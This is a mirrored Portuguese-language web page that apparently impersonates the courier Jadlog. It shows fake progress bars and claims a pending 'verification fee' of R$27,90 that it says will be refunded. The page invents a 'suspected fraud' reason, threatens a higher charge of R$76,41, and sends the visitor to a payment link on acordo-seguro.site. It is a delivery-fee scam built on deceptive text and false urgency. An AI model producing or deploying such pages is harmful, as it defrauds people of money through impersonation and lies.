﻿


<!DOCTYPE html>
<html lang="pt-BR">


<!-- Mirrored from portal-oficial-atendimentos.vercel.app/up-3/up2/up2.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Apr 2025 23:27:19 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="icon" href="../../../consulte-solicitar.com/up2/images/favicon.html" type="./image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="../../../consulte-solicitar.com/up2/images/favicon.html">

    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link href="https://portal-oficial-atendimentos.vercel.app/up-3/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">

    <link rel="stylesheet" href="css/base.css">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="https://portal-oficial-atendimentos.vercel.app/up-3/css2-1?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0">
    <title>Zero Taxação</title>

    <script>
        window.googlePixelId = "68d6ee4d49ca42fd3110cd5c";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel-google.js");
        document.head.appendChild(a);
    </script>
    <script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-xcod-sck
        data-utmify-prevent-subids async defer></script>
	
</head>

<body>
    <div id="content">
        <style>.navbar {
                display: flex;
                justify-content: space-between;
                align-items: center;
                background-color: #2865AE;
                padding-bottom: 10px;
                padding-left: 10px;
            }
        </style>
        <nav class="navbar" style="padding-top: 15px;">
            <div class="menu-icon" style="padding-left: 3%;">
                <img src="images/logo-jadlog.png" style="height: 5vh;" alt="Logo Central Vivara">
            </div>

            <div class="logo-central">
            </div>

            
        </nav>


        <div class="progress-container">
            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar1"></div>

                    <div class="check-container" id="check1">
                        <img src="images/success.png" alt="Animação" id="img1">
                    </div>
                </div>

                <p id="text1">Analisando Dados</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar2"></div>

                    <div class="check-container" id="check2">
                        <img src="images/success.png" alt="Animação" id="img2">
                    </div>
                </div>

                <p id="text2">Preparando transferência</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar3"></div>

                    <div class="check-container" id="check3">
                        <img src="images/success.png" alt="Animação" id="img3">
                    </div>
                </div>

                <p id="text3">Pagamento Efetuado</p>
            </div>

            <div>
                <div class="progress-item">
                    <div class="progress-bar" id="bar4"></div>

                    <div class="check-container" id="check4">
                        <img src="images/success.png" alt="Animação" id="img4">
                    </div>
                </div>

                <p id="text4">Concluido</p>
            </div>
        </div>

        <section id="more-information">
            <h1>ATENÇÃO!</h1>

            <h2>Confirmação necessária</h2>

            <p>
                Durante a análise do seu pedido, identificamos uma <span class="bold">pendência relacionada à taxa de
                    verificação</span>, necessária para garantir a segurança da entrega e evitar possíveis fraudes.
            </p>

            <p>
                Essa taxa é <span class="bold">reembolsável</span> e será devolvida automaticamente após a confirmação
                do pagamento.
            </p>

            <p>Clique no botão abaixo para calcular e regularizar a taxa.</p>


            <button id="show-offer" disabled="">CALCULAR TAXA</button>
        </section>
    </div>

    <div id="offer-modal" class="modal">
        <div class="modal-content">

            <div id="step1">
                <h1>Verificando pendência</h1>

                <div id="trace" class="progress-bar2"></div>

                <p>Por favor, aguarde enquanto processamos...</p>
            </div>

            <div id="step2">
                <p>MOTIVO DA TAXA:</p>
                <span id="reason" class="bold">SUSPEITA DE FRAUDE</span><br>

                <p>Foi identificada uma <span class="bold2">taxa obrigatória de validação</span> para garantir a
                    segurança do processo.
                    Após o pagamento, o valor será <span class="bold2">totalmente reembolsado</span>.</p>

                <h1>REGULARIZE AGORA</h1>

                <p>Efetue o pagamento</p>

                <h1 id="value">R$27,90</h1>

                <a onclick="checkout(event)">REGULARIZAR TAXA</a>

                <p>Atenção: Caso o valor de <span class="bold3">R$16,50</span> não seja quitado, o sistema exigirá o
                    pagamento integral de
                    <span class="bold4">R$76,41</span>. O não cumprimento poderá acarretar em bloqueios no processo.
                </p>
            </div>
        </div>
    </div>

    <script>
        function checkout(event) {
          event.preventDefault(); 
          var currentUrlParams = window.location.search;
          window.location.href = "https://pay.acordo-seguro.site/1VOvGV4WnOb3D62?&utm_source={{utm_source}}&utm_campaign={{utm_campaign}}&utm_medium={{utm_medium}}&utm_content={{utm_content}}&utm_term={{utm_term}}&xcod={{xcod}}";
        }
      </script>

    <script src="js/scripts.js"></script>


</body>


<!-- Mirrored from portal-oficial-atendimentos.vercel.app/up-3/up2/up2.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Apr 2025 23:27:22 GMT -->
</html>